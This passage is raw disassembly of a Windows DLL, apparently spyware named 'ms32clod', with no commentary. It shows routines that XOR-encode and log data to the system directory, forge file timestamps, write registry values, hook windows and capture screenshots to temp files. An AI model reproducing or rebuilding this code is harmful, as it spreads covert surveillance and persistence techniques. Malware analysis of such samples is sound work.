shl ecx, 4
mov [ebp+var_14], ecx
jmp short loc_100028B0
; ---------------------------------------------------------------------------
loc_10002916: ; CODE XREF: sub_10002881+3C�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_10002881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000291D(LPCSTR Source, int, int)
sub_1000291D proc near ; CODE XREF: sub_1000FFF9+78�p
; sub_1000FFF9+9F�p ...
var_114 = dword ptr -114h
FileName = byte ptr -110h
nNumberOfBytesToWrite= dword ptr -10h
hObject = dword ptr -0Ch
NumberOfBytesWritten= dword ptr -8
Dest = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
cmp [ebp+arg_4], 0FFFFFFFFh
jnz short loc_1000293B
mov eax, [ebp+Source]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+nNumberOfBytesToWrite], eax
jmp short loc_10002941
; ---------------------------------------------------------------------------
loc_1000293B: ; CODE XREF: sub_1000291D+D�j
mov ecx, [ebp+arg_4]
mov [ebp+nNumberOfBytesToWrite], ecx
loc_10002941: ; CODE XREF: sub_1000291D+1C�j
mov edx, [ebp+nNumberOfBytesToWrite]
add edx, 1
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dest], eax
mov eax, [ebp+nNumberOfBytesToWrite]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+Dest]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+nNumberOfBytesToWrite]
push edx ; Count
mov eax, [ebp+Source]
push eax ; Source
mov ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
cmp [ebp+arg_8], 0FFFFFFFFh
jnz loc_10002A18
push 0FFh ; uSize
lea edx, [ebp+FileName]
push edx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset asc_100227B8 ; "\\"
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022078
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
mov [ebp+var_114], 0
jmp short loc_100029F0
; ---------------------------------------------------------------------------
loc_100029E1: ; CODE XREF: sub_1000291D+F7�j
mov ecx, [ebp+var_114]
add ecx, 1
mov [ebp+var_114], ecx
loc_100029F0: ; CODE XREF: sub_1000291D+C2�j
mov edx, [ebp+var_114]
cmp edx, [ebp+nNumberOfBytesToWrite]
jnb short loc_10002A16
mov eax, [ebp+Dest]
add eax, [ebp+var_114]
mov cl, [eax]
xor cl, 96h
mov edx, [ebp+Dest]
add edx, [ebp+var_114]
mov [edx], cl
jmp short loc_100029E1
; ---------------------------------------------------------------------------
loc_10002A16: ; CODE XREF: sub_1000291D+DC�j
jmp short loc_10002A32
; ---------------------------------------------------------------------------
loc_10002A18: ; CODE XREF: sub_1000291D+65�j
push offset aMs32clod_0 ; "ms32clod"
push offset aCS_log ; "c:\\%s.log"
lea eax, [ebp+FileName]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
loc_10002A32: ; CODE XREF: sub_1000291D:loc_10002A16�j
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_10002AA8
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov ecx, [ebp+nNumberOfBytesToWrite]
push ecx ; nNumberOfBytesToWrite
mov edx, [ebp+Dest]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
cmp [ebp+arg_8], 0FFFFFFFFh
jnz short loc_10002A9E
push offset CreationTime ; lpLastWriteTime
push offset CreationTime ; lpLastAccessTime
push offset CreationTime ; lpCreationTime
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:SetFileTime ; SetFileTime
loc_10002A9E: ; CODE XREF: sub_1000291D+166�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10002AA8: ; CODE XREF: sub_1000291D+138�j
cmp [ebp+arg_8], 0FFFFFFFFh
jnz short loc_10002ABF
push 0 ; int
lea eax, [ebp+FileName]
push eax ; Str
call sub_10009FE2
add esp, 8
loc_10002ABF: ; CODE XREF: sub_1000291D+18F�j
mov ecx, [ebp+Dest]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov esp, ebp
pop ebp
retn
sub_1000291D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov dword ptr [ebp-0Ch], 0
push 0
push 0
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
push 0
push 0FDE9h
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
mov edx, [ebp-8]
lea eax, [edx+edx+2]
push eax
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 4
mov [ebp-10h], eax
mov ecx, [ebp-10h]
mov [ebp-4], ecx
mov edx, [ebp-8]
add edx, 5
push edx
push 1
call ds:calloc ; calloc
add esp, 8
mov [ebp-0Ch], eax
mov eax, [ebp-8]
push eax
mov ecx, [ebp-4]
push ecx
push 0FFFFFFFFh
mov edx, [ebp+8]
push edx
push 0
push 0FDE9h
call ds:MultiByteToWideChar ; MultiByteToWideChar
push 0
push 0
mov eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
push ecx
push 0FFFFFFFFh
mov edx, [ebp-4]
push edx
push 0
push 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov eax, [ebp-0Ch]
add eax, [ebp-8]
mov byte ptr [eax], 0
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov edx, [ebp-14h]
push edx
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov dword ptr [ebp-0Ch], 0
push 0
push 0
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
push 0
push 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
shl eax, 1
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
mov edx, [ebp-8]
lea eax, [edx+edx+2]
push eax
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 4
mov [ebp-10h], eax
mov ecx, [ebp-10h]
mov [ebp-4], ecx
mov edx, [ebp-8]
add edx, 1
push edx
push 1
call ds:calloc ; calloc
add esp, 8
mov [ebp-0Ch], eax
mov eax, [ebp-8]
push eax
mov ecx, [ebp-4]
push ecx
push 0FFFFFFFFh
mov edx, [ebp+8]
push edx
push 0
push 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
push 0
push 0
mov eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
push ecx
push 0FFFFFFFFh
mov edx, [ebp-4]
push edx
push 0
push 0FDE9h
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov eax, [ebp-0Ch]
add eax, [ebp-8]
mov byte ptr [eax], 0
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov edx, [ebp-14h]
push edx
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10002C3D(HKEY hKey, char *Str, LPCSTR lpValueName, char *Source, int)
sub_10002C3D proc near ; CODE XREF: sub_1000A318+A4D�p
; sub_1000B027+4B9�p ...
var_510 = dword ptr -510h
var_50C = dword ptr -50Ch
phkResult = dword ptr -508h
Dest = byte ptr -504h
var_503 = byte ptr -503h
dwDisposition = dword ptr -404h
Data = byte ptr -400h
var_3FF = byte ptr -3FFh
hKey = dword ptr 8
Str = dword ptr 0Ch
lpValueName = dword ptr 10h
Source = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 510h
push edi
mov [ebp+Dest], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_503]
rep stosd
stosw
stosb
mov [ebp+Data], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_3FF]
rep stosd
stosw
stosb
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+Str]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jz short loc_10002CF0
lea edx, [ebp+dwDisposition]
push edx ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+Str]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
loc_10002CF0: ; CODE XREF: sub_10002C3D+71�j
cmp [ebp+arg_10], 0
jnz loc_10002D7C
push 0FFh ; uSize
lea edx, [ebp+Data]
push edx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+Dest]
push eax ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, [ebp+Source]
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; Source
lea eax, [ebp+Data]
push eax ; Dest
call strcat ; strcat
add esp, 8
lea ecx, [ebp+Data]
push ecx ; Str
call strlen ; strlen
add esp, 4
add eax, 1
push eax ; cbData
lea edx, [ebp+Data]
push edx ; lpData
push 1 ; dwType
push 0 ; Reserved
lea eax, [ebp+Dest]
push eax ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, [ebp+lpValueName]
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpValueName
mov eax, [ebp+phkResult]
push eax ; hKey
call ds:RegSetValueExA ; RegSetValueExA
loc_10002D7C: ; CODE XREF: sub_10002C3D+B7�j
cmp [ebp+arg_10], 1
jnz short loc_10002DF2
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+Source]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; Source
lea ecx, [ebp+Data]
push ecx ; Dest
call strcat ; strcat
add esp, 8
lea edx, [ebp+Data]
push edx ; Str
call strlen ; strlen
add esp, 4
add eax, 1
push eax ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+lpValueName]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpValueName
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
loc_10002DF2: ; CODE XREF: sub_10002C3D+143�j
cmp [ebp+arg_10], 2
jnz short loc_10002E40
mov edx, [ebp+Source]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_50C], eax
push 4 ; cbData
lea eax, [ebp+var_50C]
push eax ; lpData
push 4 ; dwType
push 0 ; Reserved
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+lpValueName]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpValueName
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
loc_10002E40: ; CODE XREF: sub_10002C3D+1B9�j
cmp [ebp+arg_10], 3
jnz short loc_10002E88
mov edx, [ebp+Source]
push edx ; Source
lea eax, [ebp+Data]
push eax ; Dest
call strcat ; strcat
add esp, 8
lea ecx, [ebp+Data]
push ecx ; Str
call strlen ; strlen
add esp, 4
add eax, 1
push eax ; cbData
lea edx, [ebp+Data]
push edx ; lpData
push 1 ; dwType
push 0 ; Reserved
mov eax, [ebp+lpValueName]
push eax ; lpValueName
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
loc_10002E88: ; CODE XREF: sub_10002C3D+207�j
cmp [ebp+arg_10], 4
jnz short loc_10002ED5
mov edx, [ebp+Source]
push edx ; Str
call sub_10002881
add esp, 4
mov [ebp+var_510], eax
push 4 ; cbData
lea eax, [ebp+var_510]
push eax ; lpData
push 4 ; dwType
push 0 ; Reserved
lea ecx, [ebp+Dest]
push ecx ; Dest
mov edx, off_10022030
push edx ; int
mov eax, [ebp+lpValueName]
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpValueName
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
loc_10002ED5: ; CODE XREF: sub_10002C3D+24F�j
mov edx, [ebp+phkResult]
push edx ; hKey
call ds:RegFlushKey ; RegFlushKey
mov eax, [ebp+phkResult]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
mov eax, 1
pop edi
mov esp, ebp
pop ebp
retn
sub_10002C3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall fn(HWND, LPARAM)
fn proc near ; DATA XREF: sub_10002F3C+6A�o
Src = dword ptr 8
Dst = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+Src]
push eax ; hWnd
call ds:IsWindowVisible ; IsWindowVisible
test eax, eax
jz short loc_10002F2E
push 3 ; gaFlags
mov ecx, [ebp+Src]
push ecx ; hwnd
call GetAncestor ; GetAncestor
mov [ebp+Src], eax
push 4 ; Size
lea edx, [ebp+Src]
push edx ; Src
mov eax, [ebp+Dst]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor eax, eax
jmp short loc_10002F33
; ---------------------------------------------------------------------------
loc_10002F2E: ; CODE XREF: fn+F�j
mov eax, 1
loc_10002F33: ; CODE XREF: fn+33�j
pop ebp
retn 8
fn endp
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002F3C proc near ; CODE XREF: sub_1000537C+2F�p
te = THREADENTRY32 ptr -28h
th32ProcessID = dword ptr -0Ch
hObject = dword ptr -8
lParam = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push edi
mov [ebp+lParam], 0
call ds:GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+th32ProcessID], eax
mov eax, [ebp+th32ProcessID]
push eax ; th32ProcessID
push 4 ; dwFlags
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_10002FCC
mov [ebp+te.dwSize], 0
mov ecx, 6
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
mov [ebp+te.dwSize], 1Ch
lea ecx, [ebp+te]
push ecx ; lpte
mov edx, [ebp+hObject]
push edx ; hSnapshot
call Thread32First ; Thread32First
test eax, eax
jz short loc_10002FCC
loc_10002F92: ; CODE XREF: sub_10002F3C+8E�j
mov eax, [ebp+te.th32OwnerProcessID]
cmp eax, [ebp+th32ProcessID]
jnz short loc_10002FBB
mov ecx, [ebp+te.th32ThreadID]
cmp ecx, [ebp+arg_0]
jnz short loc_10002FBB
lea edx, [ebp+lParam]
push edx ; lParam
push offset fn ; lpfn
mov eax, [ebp+te.th32ThreadID]
push eax ; dwThreadId
call ds:EnumThreadWindows ; EnumThreadWindows
test eax, eax
jnz short loc_10002FBB
jmp short loc_10002FCC
; ---------------------------------------------------------------------------
loc_10002FBB: ; CODE XREF: sub_10002F3C+5C�j
; sub_10002F3C+64�j ...
lea ecx, [ebp+te]
push ecx ; lpte
mov edx, [ebp+hObject]
push edx ; hSnapshot
call Thread32Next ; Thread32Next
test eax, eax
jnz short loc_10002F92
loc_10002FCC: ; CODE XREF: sub_10002F3C+29�j
; sub_10002F3C+54�j ...
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [ebp+lParam]
pop edi
mov esp, ebp
pop ebp
retn
sub_10002F3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __stdcall TimerFunc(HWND, UINT, UINT_PTR, DWORD)
TimerFunc proc near ; DATA XREF: sub_1000537C:loc_10005551�o
var_258 = dword ptr -258h
lpWideCharStr = dword ptr -254h
MultiByteStr = byte ptr -250h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_11C = byte ptr -11Ch
var_110 = dword ptr -110h
String2 = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10002FDE
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 24Ch
push edi
mov [ebp+var_110], 0
mov [ebp+String2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
stosw
push 0Ah ; dwMilliseconds
mov eax, hHandle
push eax ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
test eax, eax
jz short loc_10003036
jmp loc_1000344F
; ---------------------------------------------------------------------------
loc_10003036: ; CODE XREF: TimerFunc+51�j
cmp dword_10037124, 0
jnz short loc_1000307D
mov ecx, hhk
push ecx ; hhk
call ds:UnhookWindowsHookEx ; UnhookWindowsHookEx
mov hhk, 0
mov edx, dword_1006A910
push edx ; hhk
call ds:UnhookWindowsHookEx ; UnhookWindowsHookEx
mov dword_1006A910, 0
mov eax, uIDEvent
push eax ; uIDEvent
push 0 ; hWnd
call ds:KillTimer ; KillTimer
jmp short loc_1000308A
; ---------------------------------------------------------------------------
loc_1000307D: ; CODE XREF: TimerFunc+5F�j
mov ecx, hHandle
push ecx ; hEvent
call ds:ResetEvent ; ResetEvent
loc_1000308A: ; CODE XREF: TimerFunc+9D�j
mov edx, h
push edx ; h
mov eax, hdc
push eax ; hdc
call ds:SelectObject ; SelectObject
mov ho, eax
mov ecx, hdc
push ecx ; hdc
call ds:DeleteDC ; DeleteDC
lea ecx, [ebp+var_11C]
call sub_1000EA00
mov [ebp+var_4], 0
cmp ho, 0
jnz short loc_100030CF
jmp loc_10003416
; ---------------------------------------------------------------------------
loc_100030CF: ; CODE XREF: TimerFunc+EA�j
lea ecx, [ebp+var_11C]
call sub_1000D550
and eax, 0FFh
test eax, eax
jz loc_10003416
push offset dword_10034250 ; int
push offset aImageJpeg ; "image/jpeg"
call sub_1000279F
add esp, 8
push 0
mov edx, ho
push edx
lea ecx, [ebp+var_12C]
call ??0strstreambuf@@QAE@PADH0@Z ; strstreambuf::strstreambuf(char *,int,char *)
mov byte ptr [ebp+var_4], 1
mov [ebp+var_130], 14h
mov [ebp+var_150], 1
mov eax, ds:dword_1001FB4C
mov [ebp+var_14C], eax
mov ecx, ds:dword_1001FB50
mov [ebp+var_148], ecx
mov edx, ds:dword_1001FB54
mov [ebp+var_144], edx
mov eax, ds:dword_1001FB58
mov [ebp+var_140], eax
mov [ebp+var_138], 4
mov [ebp+var_13C], 1
lea ecx, [ebp+var_130]
mov [ebp+var_134], ecx
push 200h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpWideCharStr], eax
mov edx, [ebp+lpWideCharStr]
push edx ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathW ; GetTempPathW
call ds:GetTickCount ; GetTickCount
push eax
push offset byte_10065ED8
mov eax, [ebp+lpWideCharStr]
push eax
push offset aSHs_D_tmp ; "%s%hs_%d.tmp"
mov ecx, [ebp+lpWideCharStr]
push ecx ; LPWSTR
call ds:wsprintfW ; wsprintfW
add esp, 14h
cmp dword_10037124, 0
jz short loc_10003202
push 0
push offset dword_10030218
lea ecx, [ebp+var_12C]
call sub_1000D3D0
mov [ebp+var_258], eax
lea edx, [ebp+var_150]
push edx
push offset dword_10034250
mov eax, [ebp+lpWideCharStr]
push eax
mov ecx, [ebp+var_258]
call sub_1000D120
jmp short loc_10003220
; ---------------------------------------------------------------------------
loc_10003202: ; CODE XREF: TimerFunc+1EA�j
lea ecx, [ebp+var_150]
push ecx
push offset dword_10034250
mov edx, [ebp+lpWideCharStr]
push edx
lea ecx, [ebp+var_12C]
call sub_1000D120
loc_10003220: ; CODE XREF: TimerFunc+222�j
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
mov eax, [ebp+lpWideCharStr]
push eax ; Str
call ds:__imp_wcslen
add esp, 4
lea ecx, [eax+eax+1]
push ecx ; cbMultiByte
lea edx, [ebp+MultiByteStr]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov eax, [ebp+lpWideCharStr]
push eax ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov ecx, [ebp+lpWideCharStr]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+var_110], 0
loc_1000326D: ; CODE XREF: TimerFunc+2BA�j
mov edx, [ebp+var_110]
cmp dword_1004B770[edx*4], 0
jz short loc_1000329A
cmp [ebp+var_110], 1000h
jge short loc_1000329A
mov eax, [ebp+var_110]
add eax, 1
mov [ebp+var_110], eax
jmp short loc_1000326D
; ---------------------------------------------------------------------------
loc_1000329A: ; CODE XREF: TimerFunc+29D�j
; TimerFunc+2A9�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_110]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_0 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_110]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_110]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_110]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+MultiByteStr]
push eax ; lpString2
mov ecx, [ebp+var_110]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10003354: ; CODE XREF: TimerFunc+39D�j
push 2Fh ; Val
push offset Str ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_1000337D
push 2Fh ; Val
push offset Str ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 23h
jmp short loc_10003354
; ---------------------------------------------------------------------------
loc_1000337D: ; CODE XREF: TimerFunc+388�j
push offset Str
call sub_1000116E
add esp, 4
push offset Str
push offset byte_10065ED8
push offset aS__S_jpg ; "%s__%s.jpg"
mov eax, [ebp+var_110]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov edx, [ebp+var_110]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_110]
mov [eax+308h], ecx
mov edx, [ebp+var_110]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+30Ch], 1
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+var_110]
mov edx, dword_1004B770[ecx*4]
push edx ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_12C]
call sub_1000D180
loc_10003416: ; CODE XREF: TimerFunc+EC�j
; TimerFunc+103�j
mov eax, ho
push eax ; ho
call ds:DeleteObject ; DeleteObject
mov dword_1006A900, 0
cmp dword_10037124, 0
jnz short loc_1000343D
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000343D: ; CODE XREF: TimerFunc+455�j
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_11C]
call sub_1000EA94
loc_1000344F: ; CODE XREF: TimerFunc+53�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
mov esp, ebp
pop ebp
retn 10h
TimerFunc endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10003460(HWND hWnd, int)
sub_10003460 proc near ; CODE XREF: sub_10001D30+41�p
; sub_10004960+97�p ...
hmod = dword ptr -4
hWnd = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push offset aMs32clod_1 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+hmod], eax
cmp dword_1006A964, 0
jz short loc_10003486
mov eax, hWnd
push eax
call sub_100034DC
loc_10003486: ; CODE XREF: sub_10003460+19�j
push 0 ; lpdwProcessId
mov ecx, [ebp+hWnd]
push ecx ; hWnd
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax ; dwThreadId
mov edx, [ebp+hmod]
push edx ; hmod
push offset sub_10003541 ; lpfn
push 4 ; idHook
call ds:SetWindowsHookExA ; SetWindowsHookExA
mov dword_1006A964, eax
cmp dword_1006A964, 0
jnz short loc_100034B6
xor eax, eax
jmp short loc_100034D6
; ---------------------------------------------------------------------------
loc_100034B6: ; CODE XREF: sub_10003460+50�j
mov eax, [ebp+hWnd]
mov hWnd, eax
mov ecx, [ebp+arg_4]
mov Msg, ecx
mov dword_10073980, 1
mov eax, 1
loc_100034D6: ; CODE XREF: sub_10003460+54�j
mov esp, ebp
pop ebp
retn 8
sub_10003460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100034DC proc near ; CODE XREF: sub_10001D30+4F�p
; sub_10003460+21�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov ecx, offset dword_100281E0
call sub_1000E160
and eax, 0FFh
test eax, eax
jz short loc_10003518
mov ecx, offset dword_100281E0
call sub_1000E130
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
push edx
call dword ptr [ecx+8]
push 0
mov ecx, offset dword_100281E0
call sub_1000E210
loc_10003518: ; CODE XREF: sub_100034DC+15�j
mov dword_10073980, 0
cmp dword_1006A964, 0
jz short loc_10003539
mov eax, dword_1006A964
push eax ; hhk
call ds:UnhookWindowsHookEx ; UnhookWindowsHookEx
jmp short loc_1000353B
; ---------------------------------------------------------------------------
loc_10003539: ; CODE XREF: sub_100034DC+4D�j
xor eax, eax
loc_1000353B: ; CODE XREF: sub_100034DC+5B�j
mov esp, ebp
pop ebp
retn 4
sub_100034DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; LRESULT __stdcall sub_10003541(int, WPARAM, LPARAM)
sub_10003541 proc near ; DATA XREF: sub_10003460+37�o
var_8 = dword ptr -8
var_4 = dword ptr -4
nCode = dword ptr 8
wParam = dword ptr 0Ch
lParam = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+lParam]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
cmp edx, Msg
jnz short loc_100035C6
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
cmp ecx, hWnd
jnz short loc_100035C6
mov edx, [ebp+var_4]
cmp dword ptr [edx+4], 2
jnz short loc_100035C6
push 0 ; pvReserved
call ds:CoInitialize
call sub_10003645
test eax, eax
jz short loc_10003588
call sub_10003786
loc_10003588: ; CODE XREF: sub_10003541+40�j
mov ecx, offset dword_100281E0
call sub_1000E160
and eax, 0FFh
test eax, eax
jz short loc_100035C0
mov ecx, offset dword_100281E0
call sub_1000E130
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, [ebp+var_8]
push edx
call dword ptr [ecx+8]
push 0
mov ecx, offset dword_100281E0
call sub_1000E210
loc_100035C0: ; CODE XREF: sub_10003541+58�j
call ds:CoUninitialize
loc_100035C6: ; CODE XREF: sub_10003541+18�j
; sub_10003541+26�j ...
cmp [ebp+nCode], 0
jge short loc_100035E6
mov eax, [ebp+lParam]
push eax ; lParam
mov ecx, [ebp+wParam]
push ecx ; wParam
mov edx, [ebp+nCode]
push edx ; nCode
mov eax, dword_1006A964
push eax ; hhk
call ds:CallNextHookEx ; CallNextHookEx
jmp short loc_100035FF
; ---------------------------------------------------------------------------
loc_100035E6: ; CODE XREF: sub_10003541+89�j
